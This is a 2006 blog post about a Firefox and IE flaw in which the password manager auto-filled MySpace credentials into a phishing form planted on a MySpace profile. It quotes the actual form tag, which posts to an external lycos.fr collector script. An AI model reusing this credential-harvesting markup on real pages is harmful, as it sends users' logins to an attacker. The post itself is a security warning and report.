Monday November 27, 2006 
Monday November 27, 2006
Cross-Site Forms + Password Manager = Security Failure
forums.mozillazine.org, forums.mozillazine.org -> bugzilla.mozilla.org :
I was shocked today to find an in-the-wild phish that uses nothing more than cross-site forms, and also extracts information from the Password Manger!
The underlying method was so obvious that it should have raised multiple warnings. There were none at all.
It was in a MySpace profile that included this tag:
<form name="2" action="http://membres.lycos.fr/adel88duran/plaguedoctor.php" method="post">
What followed was a nearly perfect-looking MySpace login form that used simple HTML and absolute positioning.
Not only did FireFox fail to raise a warning, it auto-filled my www.myspace.com username and password into this form!! I hope anyone reading this realizes it is a security failure for the browser to auto-fill the membres.lycos.fr form with credentials from another website ...
- As a browser security breach, this is too easy. Have to be very careful before submitting forms with auto-filled passwords. Seems to be a basic design issue that affects both IE and Firefox. Convenience vs security.
Kind of ignored this from a couple of weeks back until I went over to Mozillazine and read how the bug works. Really too easy. All you need is a website that allows people to edit HTML code. And for you to have a saved password on that site.
2 weeks now, and still awaiting a 2.0.x fix for Firefox. At least we know that the Firefox folks are working on it.
Update - to check if your browser is vulnerable to this exploit, you can try this demo page by Heise Security. From comment #66 in the bugzilla page.
(2006-11-27 16:44:53 SGT)
[Tech]
Permalink
Comments:
Post a Comment:
Comments are closed for this entry.
Most popular blog postings on lowem.log :
1. 2010 Nissan Leaf electric car specifications : 107hp, 24KWh lithium-ion batteries, 100-mile range
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Honda Civic Hybrid preliminary specifications released
4. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004
5. How to insert currency exchange rates into Google Spreadsheets
6. Singapore : Nuclear power not ruled out
7. Live spot gold price quotes chart on COMEX
8. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
Featured articles on lowem.log :
1. 2010 Honda Civic Hybrid preliminary specifications released
2. 2010 Honda CR-Z hybrid, 2010 Honda Fit/Jazz hybrid models confirmed
3. 2010 Toyota Prius specifications released : 50 mpg, 1.8L, 134hp, Ni-MH, solar roof option
4. Honda, GS Yuasa JV to make lithium-ion batteries for 2010/2011 Honda Civic Hybrid
5. New efficient nanotech materials may boost enhanced geothermal power systems
6. NYMEX crude oil recovers from $32.40 low after 2.2 mbpd OPEC production cut announced
7. Singapore property market recovery seen as private home sales surge 52% in Jul 2009
8. Singapore SIBOR rate falls to 0.69% in Jan 2009, lowest since Apr 2004
| search |
Custom Search
|
| sponsored links |
|
|
| bookmarks |
|
about
blogroll
sites
quotes
charts
historical |
| navigation |
| decals |
|
| powered by |
|
| hosted by |
|